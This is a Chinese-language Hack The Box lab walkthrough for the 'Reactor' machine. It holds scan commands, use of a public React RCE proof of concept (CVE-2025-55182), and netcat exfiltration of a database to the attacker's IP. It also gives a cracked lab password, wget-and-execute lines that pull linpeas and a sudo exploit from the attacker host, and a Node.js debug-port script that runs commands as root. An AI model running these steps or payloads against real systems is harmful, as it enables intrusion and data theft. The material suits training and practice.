HTB - Reactor

前言

···

最近太忙嘞,忙里抽空打了一下,望各位见谅

···

复制代码
10.129.4.61

nmap扫描

复制代码
sudo nmap --top-ports 10000 10.129.4.61 --min-rate=1000 -oA ips_quick_TCP_nmapscan && sudo nmap --top-ports 10000 10.129.4.61 --min-rate=1000 -sU -oA ips_quick_UDP_nmapscan && nmap -p- 10.129.4.61 -oA ips_full_TCP_nmapscan --min-rate=1000 && sudo nmap -p- 10.129.4.61 -sU -oA ips_full_UDP_nmapscan --min-rate=1000

nmap详细扫描

复制代码
nmap -sV -sC -p22,3000 --min-rate=1000 10.129.4.61 -vv -Pn

我们进一步查看3000端口,访问

复制代码
http://10.129.4.61:3000/

查明中间件版本,发现React,该框架在2025年爆出RCE漏洞

我们查找道POC

复制代码
https://github.com/ThemeHackers/CVE-2025-55182

使用POC

复制代码
python CVE-2025-55182.py -u http://10.129.4.61:3000/ 

开始反连

复制代码
python CVE-2025-55182.py -u http://10.129.4.61:3000/  --exploit

发现reactor.db,传输文件道kali

复制代码
nc -lvnp 8888 > reactor.db
nc -q 0 10.10.14.240 8888 < reactor.db

查看文件

破解密码

获取engineer用户

复制代码
engineer:reactor1

上linpeas

复制代码
wget http://10.10.14.240/linpeas.sh && chmod 755 linpeas.sh && ./linpeas.sh

尝试sudo提权,提权失败·

复制代码
wget http://10.10.14.240/sudo_Pwned_1_9_14-1_9_17.sh && chmod 755 sudo_Pwned_1_9_14-1_9_17.sh && ./sudo_Pwned_1_9_14-1_9_17.sh

我们发现9229开启了node的调试端口

访问端口查看调试端口后面的序列

复制代码
curl http://127.0.0.1:9229/json

我们使用ws链接调试端口,并执行恶意命令

复制代码
const WebSocket = require('ws');

const ws = new WebSocket('ws://127.0.0.1:9229/5c0cfa64-f235-4c68-9b60-57251cead0a2'); //Change it to your ws

ws.on('open', function () {
    console.log('connected');

    // 执行 JS
    ws.send(JSON.stringify({
        id: 1,
        method: "Runtime.evaluate",
        params: {
            expression: `
                this.constructor.constructor('return process')()
                .mainModule.require('child_process')
                .execSync('id')
                .toString()
            `
        }
    }));
});

ws.on('message', function (data) {
    console.log(data.toString());
});

执行脚本

复制代码
npm install ws

ssh -L 9229:127.0.0.1:9229 engineer@10.129.4.61 -fN 

node nodejs_debug_port_RCE.js

到此已经完成root的任意命令执行。

相关推荐
lularible1 小时前
HSM技术精讲(3.8):证书对象——数字世界的“身份证明“
安全·开源·嵌入式·汽车电子·hsm
wenzhangli72 小时前
oodAgent 4.0 Skills分布式调度 — 从Code Agent实战看自主维护的Agent网络
运维·网络·人工智能·自动化
做个文艺程序员2 小时前
Linux第12篇:性能监控与瓶颈分析——CPU/内存/IO/网络全维度
linux·运维·网络
WZF-Sang2 小时前
网络基础——2
服务器·网络·c++·学习·网络编程·php
德迅--文琪3 小时前
筑牢主机安全最后一公里,德迅卫士构建全维度智能防护屏障
安全
+wacyltd大模型备案算法备案3 小时前
大模型评估测试题库怎么建?风险分类、测试样本的完整方法
人工智能·算法·安全·分类·大模型·大模型备案·大模型上线登记
智慧光迅AINOPOL3 小时前
校园光网络POL方案优劣势分析
网络·全光网解决方案·全光网·校园全光网·校园全光网解决方案
wang_shu_mo_ran4 小时前
网络编程(一):网络编程初识
运维·服务器·网络
网络研究院4 小时前
Brave浏览器放大招引入容器功能,实现多账户安全隔离
网络·安全·容器·浏览器·数据·隐私
Hiyajo pray5 小时前
属性sdn隐私保护分析
网络安全